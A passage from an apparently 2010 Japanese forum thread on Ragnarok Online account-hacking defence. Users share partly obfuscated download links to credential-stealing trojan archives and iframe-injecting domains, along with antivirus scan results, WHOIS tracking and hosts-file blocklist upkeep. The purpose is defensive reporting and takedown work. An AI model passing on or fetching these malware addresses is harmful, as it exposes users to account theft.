tp://www■atwikisjp■com/blog/love■html (4/42)
http://www.virustotal.com/analisis/d269283643499442aca7811b91102fd5e74bd1090efff6a3668f00c274929e07-1270179107
tp://www■atwikisjp■com/blog/jifeng■htm (31/42)
http://www.virustotal.com/analisis/f06ea40a6c68932d47be858672a488055d57db64a47ffe59674e759f3c791003-1270179101
tp://www■atwikisjp■com/blog/webs■htm (9/42)
http://www.virustotal.com/analisis/ced20c2cc95f482a03fd0b553db85e98f6eea9caef354fc61d7cb2bd87c087f4-1270179121
tp://www■atwikisjp■com/blog/ahf■htm (4/42)
http://www.virustotal.com/analisis/466adb57acdc73150b3622d567dba8b75a447fba2870155e735e30ffa7ccee0a-1270179128
tp://www■atwikisjp■com/blog/i1■htm (14/42)
http://www.virustotal.com/analisis/f1b49625ffb8077067fc2b5ec81e78eba3b47c9c5c6613b243baf82e49094f66-1270179146
tp://www■atwikisjp■com/blog/f2■htm (14/42)
http://www.virustotal.com/analisis/251f3de6648188a76645c38095fb68cc2e48513b5c70d1884724a4fec17b8401-1270179132

以下、404 Not Found
tp://www■atwikisjp■com/blog/ah14■htm
tp://www■atwikisjp■com/blog/nop■htm
tp://www■atwikisjp■com/blog/ah90■htm
tp://www■atwikisjp■com/blog/of■htm
tp://www■atwikisjp■com/blog/i115■swf
tp://www■atwikisjp■com/blog/i47■swf
tp://www■atwikisjp■com/blog/i45■swf
tp://www■atwikisjp■com/blog/i64■swf
tp://www■atwikisjp■com/blog/f115■swf
tp://www■atwikisjp■com/blog/f47■swf
tp://www■atwikisjp■com/blog/f45■swf
tp://www■atwikisjp■com/blog/f64■swf <> (○口○*)さん<>sage<>10/04/02 12:44 ID:9T0q54xo0<> ごめん、1箇所訂正。/blog/のとこ(0/42)じゃなかった。(2/42)で、HTML/IFrame(F-Port) でした。 <> (○口○*)さん<>sage<>10/04/02 12:45 ID:96uqZxRl0<> リムーバブルメディア経由で感染するウイルスの活動検知状況- Tokyo SOC Report
ttps://www-950.ibm.com/blogs/tokyo-soc/entry/usb_virus-201003?lang=ja
.rarで思い出したので一応

ドライブレコーダーSDカード不具合のお知らせとお詫び - コスモシステム株式会社 2010年3月18日
ttp://www.cosmo-sys.co.jp/drs/drs_oshirase.html
こっちは韓国のID狙いかも <> (○口○*)さん<>sage<>10/04/02 15:59 ID:9T0q54xo0<> チラ裏に貼られていたもの

231 (○口○*)さん New! 10/04/02 15:15 ID:XjP5VaJX0
【RO】ラグナロクオンライン2010エイプリルフールイベント
tp://www■uproda■net/down/uproda012967■zip <> (○口○*)さん<>sage<>10/04/02 16:01 ID:9T0q54xo0<> >>708

zip(35/42)
ttp://www.virustotal.com/analisis/628dfc3a42f4b8e7a7c8610243f36fef05d2b4aae4468464c6e6fa14bad47718-1270191578

中身のroro■exe(33/42)
http://www.virustotal.com/analisis/081fa00a6edfbe5805eadf0319e0acd89a95a24c0c3fbde5e06b34b1eb9cf3cc-1270191603 <> (○口○*)さん<>sage<>10/04/02 16:10 ID:9T0q54xo0<> >>708の続きの踏んだ報告…見れば判るだろうに。検出名書いてるのでコピペ

234 (○口○*)さん sage 10/04/02 15:27 ID:MzZHW7yQ0
>>231普通に踏んだそして空けちゃった☆

235 (○口○*)さん sage 10/04/02 15:47 ID:MzZHW7yQ0
踏んじまっただけの報告は意味ねえな
中身も一応・・・
roro.exeが垢ハックプログラムかな
んでTrojan.Genらしい
NortonAntivirus2010の結果でした。


あと、>709の後半(33/42)じゃなくて、(33/37)でした。よく見ないで転記してごめんなさい。
殆どが撃墜。検出名からすると、AVGがヒューリスティックで検知、トレンドマイクロがいつものPAK_Generic.001。 <> L ★<>sage<>10/04/02 23:57 ID:???0<> 5か所に書き込み

RO究極生命体変なヒドラvs超破壊魔法の勇者
http://■uproda11■2ch-library■com/234990OMD■11234990.zip

h140-210-68-70.aztec.com.tw
61.97.122.106 <> 691<>sage<>10/04/03 00:07 ID:mpO0TXNu0<> 思った以上にレスが多くてビックリしました
本人に伝えようかはまだ迷ってます
うまく説明する自信がなくなってきた……

実はトピックたった瞬間に気づいて、即レスで「これアカハック」って
注意を促すレスを書き込んだんですよ
そしたらコミュニティ運営者が速攻で消してくれたぽい
なので、証拠が残ってないという
画像残しとくべきだった

ちなみに張られたのはLoki鯖コミュ
書き込み内容はおなじみしゅんのRO日記のやつ <> (○口○*)さん<>sage<>10/04/03 00:16 ID:YwcIG79g0<> >>711
tp://uproda11■2ch-library■com/234990OMD/11234990■zip

中身は、>708-709と全く同じファイルでした。 <> (○口○*)さん<>sage<>10/04/03 00:38 ID:ZnF8SV5Z0<> >>712
削除されてても履歴でわかるだろうからmixiに通報して損はないんじゃね
さすがにmixiといえども履歴くらい残ってるだろう

本人に伝えたい気持ちがあるならとりあえずオンラインスキャンでも
やらせてみればいいんじゃね
気付いてない時点でそいつのPCのセキュリティ対策ソフトウェアは
期限切れもしくはノーガードの可能性が高い

問題はどうやってオンラインスキャンさせるとこまで持ってくかなんだけどな
親しい仲ならちゃんと言えるだろうけど、そうじゃなきゃ言えないだろうし
ダメそうなら諦めれ
冷たい言い方になっちゃうけど、そもそもお前が心を痛める問題じゃないってことを
踏まえて行動して欲しい

個人が注意するよりはmixiのアカウント停止されたほうが気付く可能性はあるかもしれないな <> (○口○*)さん<><>10/04/03 04:33 ID:ZgF9cNh90<> >>712
マイミク以外の見知らぬユーザーからのメッセージは、出会い系業者絡みだと思って読まずにスルーされる可能性もある。
管理サイドからアクションを起こして貰う方が確実ではあるよ。 <> (○口○*)さん<>sage<>10/04/03 05:33 ID:Qy53PqnX0<> なのに>>701みたいに必死に主張する人もいるんだよな <> (○口○*)さん<>sage<>10/04/03 14:16 ID:MDxlpKI80<> >>701=>>698だから>>714-715と矛盾してないぞ <> (○口○*)さん<>sage<>10/04/08 12:02 ID:uhW8YuKc0<> マイクロソフトのマルウエアBlogにDirectXが改竄され
ゲームのパスなどが盗まれているというレポートが出てた。

Microsoft Malware Protection Center Blog
ttp://blogs.technet.com/mmpc/ <> (○口○*)さん<>sage<>10/04/10 19:42 ID:fGR6VnmP0<> 【      気付いた日時          】 3/10 19:20
【不審なアドレスのクリックの有無 】 有 世界樹の迷宮wiki http://w■w.snsatfb.com/
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 NO
【  ネットカフェの利用の有無    】 No
【     OS    】 WindowsXP ServicePack3
【使用ブラウザ 】 InternetExplorer 8
【WindowsUpdateの有無】 1週間以内です
【 アンチウイルスソフト 】 ウイルスバスター2010 アップデートは常にかけています
【その他のSecurty対策 】 Ad-Aware
【 ウイルススキャン結果】 セキュリティの脅威のCookie検出 7件
【スレログやテンプレを読んだか】 今から読みます
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】 特に被害はありませんが、危険なアドレスを踏んだのが初めてで
アカウントハックの危険があるという事で、不安になって書き込みました。
URLを踏んだだけでアカウントハックされてしまうものなのでしょうか。
よろしくお願いします。 <> (○口○*)さん<>sage<>10/04/10 20:06 ID:zhv/wAwf0<> はい <> (○口○*)さん<>sage<>10/04/10 20:12 ID:p57pvY0W0<> 毎回思うけど今から読みますっていらんだろ
読んでからレスしろと
今回もURLの貼り方間違えてるし <> (○口○*)さん<>sage<>10/04/10 22:57 ID:I5K2s6kz0<> >>719
そんなエミュに釣られるお前がアホw <> (○口○*)さん<>sage<>10/04/10 23:19 ID:7pzGGfdW0<> 魔王モロク討伐クエスト報告スレ39 353

【RO漫画】『真似するなよ』
ttp://loda■jp/maple/?id=280■zip

aguseで Trojan.Win32.Agent.drfx だそうです <> (○口○*)さん<>sage<>10/04/10 23:37 ID:e4b8HabQ0<> >>723
Play■zip(中身はplay■exe)
Symantecスルー、TrendMicroはPAK_Generic.001

Zip(24/39)
http://www.virustotal.com/analisis/2bf00b270d3f950f17a8576a1f42c19a1ac6718751e8c7bc29fcb48853d720c7-1270909777

exe(25/38)
http://www.virustotal.com/analisis/04266bf9f6bfbe98b26bd9fe985a199f52a2830b38427f611a9397e9ee9125a1-1270909425 <> (○口○*)さん<>sage<>10/04/11 21:27 ID:z9oEF/C/0<> 4/2〜4/11 mixiで報告のあったアカハックspam(?)のアドレス

giacobini■blog14■fc2■com/
pandanopanda■blog109■fc2■com/
www■uproda■net/down/uproda014162■zip
www■uproda■net/down/uproda014138■zip


アプロダのzipへの投稿についていた文面(3種)
うち1種はMMOBBS内で報告のある>>723と似てますね。

きまぐれでかいてた漫画wwwwwwwww
ギャラリーにゆのやさんからの頂絵を
【RO漫画 4コママンガ劇場】自分勝手といったって <> (○口○*)さん<>sage<>10/04/11 21:37 ID:z9oEF/C/0<> giacobini■blog14■fc2■com/ は、報告時、外部(981と同じatwikisjp■comドメイン)にリダイレクトとして報告されていましたが
現在は除去されている模様。fc2のアカウントハックされたのかな?

pandanopanda■blog109■fc2■com/ は、作りたてのBlogの模様。危険サイトへ飛ばすものだったかどうかは不明。
現在はなんともなさそう。

下2つのzipは、>>723-724と同一のバイナリでした。 <> (○口○*)さん<>sage<>10/04/12 04:24 ID:F4tG0nVr0<> pandanopanda■blog109■fc2■com/
業者のパクリブログ。
「卵1000個コモド東に篭り始めてだんだん気分が乗ってきた!」で検索かけるとぱくられた別のFC2ブログが見つかった。

giacobini■blog14■fc2■com/
atwikisjp■comを呼び出すiframeが記事最下部に埋まってる。
ただ文章がおかしい
「ブログから移行するにあたってサイトをよろず化しました。」
こっちもぱくりかもわからん。

で、FC2なんだけど去年の11月ぐらいから
なにか埋め込まれてるブログ通報すると
とりあえず問題の場所撤去して、ブログ書いてる人にも同時にメールで知らせるようになったらしい。
おかげでブログ主が見たときには既に問題が無くなってるから何もしない
PWも変えなければ、PCのウィルスチェックもしないというのがどうしても出てくる。
Aguseでブログ見たら「運営から通報があったから確認してみたけど撤去されてるからまぁいいや」みたいな記述があったのよね。
で案の定再改ざん、再通報、凍結というのがいくつかあった。 <> (○口○*)さん<>sage<>10/04/12 07:02 ID:V8ELhlBB0<> ああ、なるほど。運営が問題箇所の除去だけやった時点でチェックに行っちゃったのか。
問題箇所の撤去だけしかしてないなら、時間を置いてまた書き換えられるね。それはfc2が悪いわ。
ちゃんと停止して、Blog主が原因除去してから、停止解除するようにしないと意味がない。 <> (○口○*)さん<>sage<>10/04/12 10:25 ID:+GmK0Ge30<> >>726
また記事文末にIFRAMEが仕込み直されてる。
1つある記事は2009年2月のもの。
もう1年以上放置されているブログだし、もう飽きて放置なんだろうな。
こういうのも悪いわけで、リネ資料室の管理人が言ってたことは正しいな。
放置するくらいなら中身全部消して完全閉鎖しろ、と。

ともあれ気をつけてくれよな! <> (○口○*)さん<>sage<>10/04/12 10:51 ID:RA18GsxB0<> ダンサーバードwiki
【RO漫画】『真似するなよ』 http://loda■jp/maple/?id=280

回復・消耗アイテムWiki
【RO漫画】『真似するなよ』
http://loda■jp/maple/?id=280■zip

貼られていたので削除、報告
共通化InterWikiNameiにあるwikiを一通り見て回りましたが、とりあえず現時点ではこの2箇所だけの模様 <> (○口○*)さん<>sage<>10/04/12 18:08 ID:azPKcrgv0<> >>730の関連ぐぐってたらうpろだ.netにあげられてるのを発見
中身は>>724とおなじ
管理人さんに削除依頼提出済み

うpろだコメントは以下。すでに530回DLされちまってる。
猫の漫画、というと可愛い猫が活躍するのを想像しますが、この漫画はそうじゃないです <> (○口○*)さん<>sage<>10/04/12 18:24 ID:fQ1CHetU0<> 数日前には、ここの板にも何個か書かれていたな <> (○口○*)さん<>sage<>10/04/12 18:29 ID:azPKcrgv0<> 現在 26/39
http://www.virustotal.com/jp/analisis/04266bf9f6bfbe98b26bd9fe985a199f52a2830b38427f611a9397e9ee9125a1-1271062583

Symantecスルー? <> (○口○*)さん<>sage<>10/04/12 19:37 ID:+GmK0Ge30<> >>730関連を調べるとパンヤアップローダーにもあるな。
あっちは管理放棄くさい、何せ通報フォームや連絡用メールアドレスの記載さえないのだ。

www_pangya_tv12458■zip
http://www.virscan.org/report/e6d132d0e0b9d74c0d1d2e1dcee0e92e.html
Scanner results : 25% Scanner(s) (9/36) found malware!

File Name : play■exe
http://www.virscan.org/report/b08b64778c5669dd28d5baf5344e60e7.html
Scanner results : 25% Scanner(s) (9/36) found malware!

>>724のとはVirusTOTALとVirSCANと言う違いはあれど微妙に検出結果が違う
用心用心

気をつけてくれよな! <> (○口○*)さん<>sage<>10/04/13 09:48 ID:pg3OC0M90<> あー、>>730っぽいの、俺が管理してる某鯖Gvwikiにも来てたなぁ
気がついて消してアク禁処置したけどどうしても後手になるな…

で、気がつくのが1日位遅れてしまったんだが、これを2〜3時間以内に
気がつけるような工夫って何かあるのかな?
流石に俺もしょっちゅうwikiに張り付いてる訳にもいかんし… <> (○口○*)さん<>sage<>10/04/13 10:20 ID:1dk58wra0<> pukiwiki.ini.php
$notify = 1;
のこと? <> (○口○*)さん<>sage<>10/04/13 13:45 ID:e7SOCQRX0<> >>734及びファイル名ぐぐったら出てきたタルタロスうpろだってとこ削除依頼提出済み
うpろだ.netは削除してくれた模様
loda.jpは他もありそうだな <> (○口○*)さん<>sage<>10/04/13 14:02 ID:NtvOgCjR0<> >>735
730ですが、ちなみに発見したのはROwiki更新アンテナでそんな項目が表示されたから
ttp://smith.z49.org/antenna/
wikiはRSSをはき出せるので、それをチェックするといいかも
但し、短期間の連続更新は追えないという欠点はありますが

$notifyは更新の度にメールが来るので、更新の激しいサイトだとそれはそれできつそう <> (○口○*)さん<>sage<>10/04/13 16:52 ID:pg3OC0M90<> >>736
スマン、無料wiki利用な上にそこに手を出せない作りだったので
それはちょっと無理だった

>>738
ああ、RSSか…それは盲点だった
ありがとう、仕事終わって帰ったらRSS登録して置こう <> (○口○*)さん<>sage<>10/04/13 19:42 ID:e7SOCQRX0<> >>734削除対応していただきました <> (○口○*)さん<><>10/04/14 06:09 ID:glurWjO20<> 月例age
計11件(緊急5, 重要 5, 警告 1)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-apr.mspx
ttp://blogs.technet.com/jpsecurity/archive/2010/04/09/3324038.aspx

その他:
Adobe Reader 9.3.2 <> (○口○*)さん<>sage<>10/04/14 09:10 ID:njKKuNM70<> >>731にある中華テンプレ文

猫の漫画、というと(以下略)

Google検索すると楽天ブログが出るが、
使われて悪用されてるから注意したほうがいいよとコメントしたら消されてた。
SPAM扱いかよ

一言ブログに書いておいたっていいのにね。
「それは私の記事を悪用したもので私がアップロードしたものではありません。」位コメント消す時間あるなら書けるよね普通。

しかもそのコメント文をGoogle検索すれば原文が特定可能(そのブログのみ)なんだし。
こういう姿勢も正直どういうものかなと思うな。

奴等に目をつけられてるから今後も記事から文抜かれて悪用三昧されることだろうけど。

ここのところの福建一味の傾向は
*本文が長いブログから一文抜いて悪用するのが多い
*逆に短いとパクリブログ作ることあり
こんな感じ

気をつけてくれよな! <> (○口○*)さん<>sage<>10/04/14 09:36 ID:zbKFHXUD0<> なんてコメントしたのか分からんが
自分が正義の人は頭が固いんだねえ <> (○口○*)さん<>sage<>10/04/14 12:00 ID:hju9DjNI0<> 悪用されてる旨を楽天に伝えたら凍結とかされんのかな <> (○口○*)さん<>sage<>10/04/14 12:16 ID:1O/2CR+Z0<> 悪用されてるって言うけどただ単に適当な文を支那にパクられただけじゃないの?
あなたの記事が悪用されてるので凍結しますとか頭おかしいんじゃ <> (○口○*)さん<>sage<>10/04/14 13:11 ID:v3xuBsVM0<> ブログ自体が乗っ取られて云々ならともかく
コピペされてますよーなんて言われたって何をどう気をつければいいんだろうか
正直迷惑でしかない <> (○口○*)さん<>sage<>10/04/14 17:59 ID:njKKuNM70<> つまらないことを書いて荒れてしまった、ごめんよ。


話を変えて垢ハックとは違うけれど
福建一味が業者&ネトゲ風ドメインをとってフィッシング?に進出した模様。
これの前のドメインも業者モドキであったこと、
今回のWHOISからもその可能性が高い。
Domain Name:GRANDFANTASIA■ORG
Created On:07-Apr-2010 03:50:50 UTC
Registrant State/Province:JS (江蘇省)
Registrant Postal Code:353434 (353400=福建省浦城市)

aguseで見ればそれと分かる。
WHOIS住所と郵便番号の不一致、これは連中の罠ドメインでもいくつかあった。
”住所が福建省ではないのに郵便番号は福建省”というやつね。
WHOISメアドも別業者のもの。

ちなみにgrandfantasia■netは別の中華業者が取得済み。
グランドファンタジアとドルは美味しいのだろうかね? <> (○口○*)さん<>sage<>10/04/14 20:55 ID:0uTBmy9h0<> >>742
ほんとにいつもの気をつけてくれよな!の人だとしたら
あまりに浅はかな考えと行動に失望せざるをえない・・・

パクられるのを防止するならどうすればいいんだ?
知ったところで、いちいち全部探してコメント付ける義務でもあるのか?
いつからパくられてどこに貼られていつまで続くか分からないものを
わざわざ自分のBlogで目立つところに書かないといけないのか?
それはいつまで書いておかないといけないんだ?
まったく無関係の人間なのにいつまで本人と訪問者が複雑な心境で居なきゃいけないんだ?
消したのは無関係な(と言うか本人も無関係だがw)訪問者のため、だ

SPAM扱いとか、どう見ても同等物だろう・・・ <> (○口○*)さん<>sage<>10/04/14 21:02 ID:rabZCMLU0<> >>748
まぁまぁ
誰しも失敗はあるし、ご本人も謝ってる
マターリ行こうぜ

っ 旦~ <> (○口○*)さん<>sage<>10/04/14 21:04 ID:AQOWKfXX0<> ちゃんと理解しないで勝手な行動に出るのはやめて欲しい
中華に文章をパクれるのは、原文のblog主がウィルスに感染してるからじゃないっつーの <> (○口○*)さん<>sage<>10/04/14 21:11 ID:0uTBmy9h0<> >>749
そうだな、俺たちの敵はクラッカーであってスレ住人じゃないもんな!
思えば必要悪なんだけどな、被害に遭えば用心するようにもなるし
それで対策費用で経済への影響もあり、平和ボケにも危機意識は生まれる
被害は少ないに越したことはないから、そのためにも俺たちが協力して頑張るべきだ
くれよな!の人の情報源も貴重だし、行動力は充分戦力となっているのだ

>>750
と言うわけで、俺のロナ娘のフトモモに免じて矛を収めてくれ・・・ <> (○口○*)さん<>sage<>10/04/14 21:43 ID:22AK6AnC0<> >>750
落ち着け
そんなアホな勘違いしてないことは日本語が読めればわかるはず <> (○口○*)さん<>sage<>10/04/14 22:40 ID:hju9DjNI0<> 当ブログの文章で悪影響のあるコピペが出回ってるので気をつけて、くらいの注意書きはブログ主だって出来るはず
それもなくただ削除してんだから擁護するような輩でもない <> (○口○*)さん<>sage<>10/04/14 22:53 ID:PNXmwm/40<> そんな義務はない <> (○口○*)さん<>sage<>10/04/14 23:01 ID:YsbmktQd0<> >>751
まて、それじゃ、矛を収めるどころか、ナニカでツンツンされるだけだぞっ!!
そんなにいじられたいのか、おまいは。 <> にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん (○口○*)さん<>sage<>10/04/15 10:37 ID:G2nK/u0l0<> >>756
削除依頼行ってこい(直接落ちてこないでダウンロードページ開くだけではあるが)リンク伏せてないよ!! <> (○口○*)さん<>sage<>10/04/15 10:48 ID:G2nK/u0l0<> >>756が(リンク伏せミスで)削除対象なので書き直し。おまけとしてVTの結果も追記。
>724,>730辺りのとは微妙にバイナリが違いました。

AIONアップローダーにも中華のトロイzipがあった。

tp://loda■jp/aion/?id=4339
4339■zip
【AION】エロ装備スレ うpロダ

自分以外に27ダウンロードされてた。

play.zip
ttp://www.virscan.org/report/ff7ac2820a9a31ad6e7c8f4e20664424.html
ttp://www.virustotal.com/analisis/881663031c9573bfd0068d5f2c64654b99a057bc8b01353cca832da694a57794-1271295694

1.exe
ttp://www.virscan.org/report/956210bd43d87b47c5a5a0152384b73d.html
ttp://www.virustotal.com/analisis/04266bf9f6bfbe98b26bd9fe985a199f52a2830b38427f611a9397e9ee9125a1-1271295696

どっちもマカフィー、シマンテック、トレンドマイクロは検出せず。
アップローダー管理者へは連絡済。 <> (○口○*)さん<>sage<>10/04/15 18:15 ID:O35LfG1n0<> ここで報告するなら他スレでのNGIDにされるようなレスは慎むべきだと思うの <> (○口○*)さん<>sage<>10/04/15 18:50 ID:6mzzJ/g90<> >>758のZIPいま34人
コメントにつられすぎだろ・・・
もしくはここの住人か <> (○口○*)さん<>sage<>10/04/15 19:09 ID:G2nK/u0l0<> >>760
すまん、うち1人は俺だw 検体入手させて頂きました。ベンダーへの提出は面倒なんでまだやってないっす。 <> (○口○*)さん<>sage<>10/04/15 19:57 ID:Au9uGDh50<> >>760
ノシ
シマンテックとclamAVに投げといたよ。 <> (○口○*)さん<>sage<>10/04/15 20:42 ID:CRnHcbZ20<> Java6Update20リリース
ゼロデイだった Java Deployment Toolkit の脆弱性の修正を含みます。 <> 756<>sage<>10/04/16 02:52 ID:0StRFyzM0<> >>757
うっかりしてリンク修正していないことに気がつかなかった。

削除依頼出してくれた方に感謝。 <> (○口○*)さん<>sage<>10/04/16 20:40 ID:SGfR65Rt0<> http://www.ragnarokonline.jp/news/event/fanfes2010/goods.html
RJC2010記念 ワンタイムパスワード(OTP)カードトークン 商品名: RJC2010記念 ワンタイムパスワード(OTP)カードトークン
会場特別価格: 2,000円(税込)
詳細: 大事なゲーム財産を守る「ワンタイムパスワード(OTP)」に利用できるカード型のトークンが、オリジナルデザインで登場! これさえあればケータイを持っていなくてもOTPを入力し放題で、より便利に使えるようになります! <> (○口○*)さん<>sage<>10/04/16 21:55 ID:7nE/oWdh0<> >>765
最初からこれにしろよ! <> (○口○*)さん<>sage<>10/04/16 22:45 ID:SGfR65Rt0<> 2000円で買わせて利用登録にも金掛かるってオチか? <> (○口○*)さん<>sage<>10/04/17 00:12 ID:LAuHAkt70<> 年間利用料は必要だろ
アプリ代が浮くだけ <> (○口○*)さん<>sage<>10/04/17 00:23 ID:tjchlKn40<> やれやれ <> (○口○*)さん<>sage<>10/04/17 15:36 ID:k0t+rum10<> ちなみにFF11のトークンは980円(おまけでインベントリ2倍)、利用料なし。 <> (○口○*)さん<>sage<>10/04/17 15:36 ID:lInAt9+A0<> そろそろスレチなんで <> (○口○*)さん<>sage<>10/04/17 16:04 ID:EO1YvPgD0<> ワンタイムパスワードの話がなぜスレチ? <> (○口○*)さん<>sage<>10/04/17 16:11 ID:UVMZ5kCp0<> 最近あちこちのスレで自治厨が暴れてるな <> (○口○*)さん<>sage<>10/04/17 21:34 ID:oiB3DzUp0<> スクリプトでhostsファイル更新しているんですが
行数が多すぎるのかネットにアクセスするのが遅くなってしまいます
何かいい解決策はないでしょうか? <> (○口○*)さん<>sage<>10/04/17 22:28 ID:rcjmoqc/0<> hostsいじってないからはっきりしたことは言えないけど
DNS周りのローカル処理で体感できる差が出るっていうのもなんだかマユツバ
hosts空っぽにしてみても遅かった? <> (○口○*)さん<>sage<>10/04/17 22:28 ID:rcjmoqc/0<> 逆だw
空っぽにしたら速くなる? <> (○口○*)さん<>sage<>10/04/17 22:36 ID:1KJ4hL9O0<> そのスクリプトが遅くなる原因なんじゃないの? <> (○口○*)さん<>sage<>10/04/17 22:48 ID:9J4+zE+U0<> まあまて
試しに行数聞いてみようぜ <> (○口○*)さん<>sage<>10/04/18 08:23 ID:uo2aD0Go0<> 空というかデフォルトだと全く問題ないです
行数は1万6千行ほど
スクリプトはテンプレにもあるもですし、常駐するものではなくhosts更新したら終了するものですよね?
スクリプトで更新しなくても手作業で行数の多いhostsファイルに変更しても遅くなります
遅くなるにもタイミングがあって常時遅いわけじゃないんですが
例えばPC起動して最初にブラウザを起動したときだったり
長時間動画を見た後にブラウザを使ったときに起きます
手作業でhostsファイルを入れ替えた直後も遅いです
一度繋がってしまえばその後しばらくは遅くなることはないです
素人考えだと一定時間hostsファイルにアクセスしなかったときに起こるんではないかと思うのですがよく分かりません <> (○口○*)さん<>sage<>10/04/18 09:05 ID:OHIOwxcY0<> アコプリWikiの自動更新スクリプト?

あれは接続時に実行されるスクリプトじゃないから
自分で実行する必要があるよね
スケジューラとかの設定がおかしいとかじゃないの?

単にhostsの中身が多くて云々ってことなのか
スクリプトが阿呆なのか
設定者が阿呆なのか
まずはそこの線引きをしようよ

ネットで検索してみたけど、hostsが多くて接続が遅い
って話は聞いたことが無いけどなぁ <> (○口○*)さん<>sage<>10/04/18 09:28 ID:uo2aD0Go0<> 使ってるのはその自動更新スクリプトですね
スクリプトはスタートアップで1回実行しかしていません
hostsの内容と遅くなる時間ですが
1万6千行だと繋がるまで20秒くらいで
1万行くらいだと10秒
5千行くらいで2秒?です
これはスクリプト使わずにファイルを入れ替えしています <> (○口○*)さん<>sage<>10/04/18 11:17 ID:CCFzWU2O0<> ただ闇雲に突っ込んであればいいってもんじゃねーぞ。

遅いのが更新スクリプトだけなら当然。
通常時のアクセスまで遅くなるなら、なんだろうねぇ。hostsの中身をソートでもしてみるか?

あとは、PCのCPUを載せ変えてコア数増やす位か。多分、今はシングルコアCPUだろ。 <> (○口○*)さん<>sage<>10/04/18 13:15 ID:uo2aD0Go0<> 使用している追加用のリストは最初から設定されているもののみで
スクリプトの中身にhostsのソート処理は含まれているはずです
もうPen4ではhostsファイルも読み込めない時代なんですかね <> (○口○*)さん<>sage<>10/04/18 13:22 ID:Nz07Pam70<> hostsに1万6千行って…運用方法がおかしいと思う <> (○口○*)さん<>sage<>10/04/18 13:32 ID:sG9tiB+X0<> スタートアップって起動時に読み込むからスタートアップじゃなくて完全に起動しきってからした方がいいんじゃねーの <> (○口○*)さん<>sage<>10/04/18 13:36 ID:lk6cWy/j0<> 16kもあれば絶対不要なのがあるはず <> (○口○*)さん<><>10/04/18 13:39 ID:OpWLeQvF0<> >>783
Pen4じゃ仕方がない。CoreMAと比較してクロック性能比は半分だし、OSの起動直後は各種サービスの
起動処理などがバックグラウンドで動いているから、シングルコアだと尚の事処理完了まで時間が掛かる。
世代によってはL2の容量も小さいから、それも要因になり得る。

あとは、HDD周りも足を引っ張っている可能性が考えられるかな。
現行主流のSATA2.5世代と比べたら、プラッタ容量やシークタイムなどがボトルネックになりやすい。
長期使用で代替セクタが発生していたりすると、そこだけ物理的に飛び地になり、連続的な読み込みの妨げになって
動作の遅さに繋がったりもするし。 <> (○口○*)さん<>sage<>10/04/18 14:07 ID:Z71vOylg0<> Pen4時代っつーと相当使ってるよな
デフラグしてるんだろうか
頻繁に更新してるなら断片化しまくりじゃないの
しかし行数多いなあ <> (○口○*)さん<>sage<>10/04/18 14:41 ID:uo2aD0Go0<> すいません繋がるのが遅くなるのはPC起動直後だけじゃないので・・・
起動直後だけならまだそれほど支障が出ないので割り切って使えていいのですが
HDDは半年くらい前に交換したSATAです
2.5ではないと思いますが

行数については上手い減らし方があれば教えてほしいです <> (○口○*)さん<>sage<>10/04/18 15:12 ID:H48LrsoR0<> >hostsに1万6千行って…
仕方ないっしょ、配布のhostsファイルがそれだけあるんだから
しかもその原本はここよ?
>ttp://sky■geocities.jp/ro_hp_add/ro_hp_add_hosts.txt"
>ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト (臨時)
粛々と追加してくれてる管理人を責めるみたいで何だなと

個人的には、.cnを弾くだけでもそれなりに有効かという気は

で、相談者については、起動ごとではなくて2〜3日に1回とかのペースで更新するのをお勧め
昨日今日入ってきたのには鈍感になってしまうが、それ以前のものには有効なわけだし <> (○口○*)さん<>sage<>10/04/18 15:56 ID:lF+K4DhQ0<> 内容も理解できずに1万6千行だけに反応してるんでしょ。

マジレスするだけムダ。 <> (○口○*)さん<>sage<>10/04/18 16:26 ID:Z71vOylg0<> >>779を見た感じだとディスクアクセス以外にはメモリも少なそうな気がする
7割ディスクアクセスだと思うけど動画見たあとってのはメモリ少ないからじゃないの

あとデフラグ大好きっ子としてはcontig とか適当なデフラグツールで
そのファイルだけデフラグしたら多少変わるんじゃないかなあと
半年でも使い方によってはえらい断片化するんで全部やっても良いと思うけど <> (○口○*)さん<>sage<>10/04/18 16:46 ID:lF+K4DhQ0<> よくわからんのに当てずっぽうで診断下すより、環境書いてもらう方が
先じゃないの?

つか、そうなったらエラースレでやるべきかと思うが。 <> (○口○*)さん<><>10/04/18 17:10 ID:OCDKU8Bw0<> hostsファイルが脹れ上がれば、それだけローカルのDNSリゾルバキャッシュの負担になる。
本来は外部DNSに丸投げして解決していた部分まで自PCで処理することになるんだから。
ま、Pentium4の時点でエコ買い換え推奨。 <> (○口○*)さん<>sage<>10/04/18 18:07 ID:Y3LB6omA0<> スレ違いだからどうでも良い <> (○口○*)さん<>sage<>10/04/18 21:12 ID:ZycDAo5O0<> hostsファイル運用の話は「セキュリティ全般の話題」に他ならないと思う

>>794
>ローカルのDNSリゾルバキャッシュの負担になる
キャッシュはhosts関係なく普段から利用されるものだから
そう簡単にネックになるのも不自然な感じではあるけど
そのhostsのせいでブロイラーになってるのかな?
通常は何件ぐらいキャッシュしてるんだろう

いっそ餅は餅屋ってことでBINDあたりでも入れて運用すればいいのかもしらん <> まとめ臨時
◆kJfhJwdLoM<>sage<>10/04/18 23:48 ID:4T7bdokt0<> 申し訳ありません。
失効ドメイン分については当方の環境ではキッチリと判断確認が出来る環境が無い為に
当初から、単にリストに追加するだけの作業になっています。
その為、実際にhostsリストの行数が16kを超える膨大な量になっております。

追加しているドメインについては、転載させていただいているサイト様方や
皆様のご報告から危険と思われるものを追加しているだけなので、
実際に脆弱性が修正されて安全になっていたり既に存在しない物があると思われます。
(ソースチェッカーが存続していた時はドメイン名の出所によっては
名前を変えてみて調べて危険と思われたものを追加したりしてます。
現在も予測が付きそうなものはやっています。)

実際にアカハックとは関連の無いウイルスのドメインや
有効でない追加の仕方をしているドメインがあったりすると思いますし
何日も経たずして出てくる次から次の使い捨てドメインも登録していたりします。
不要のものが絶対有るかと言われたらその通りです。

ただ申し訳ないのですが、自分の能力では現状リストのドメインを
効率よくスリム化する手段を持ち合わせていませんので、
より良い対策方法があれば、是非その方にお任せしたい次第であります。



行数にだけ関して言うと、記述を変えるだけで行数だけは減らすことが出来るようです。
ただファイル容量が減ってもドメイン数自体は変わってないので処理自体の違いは無いかもしれません。
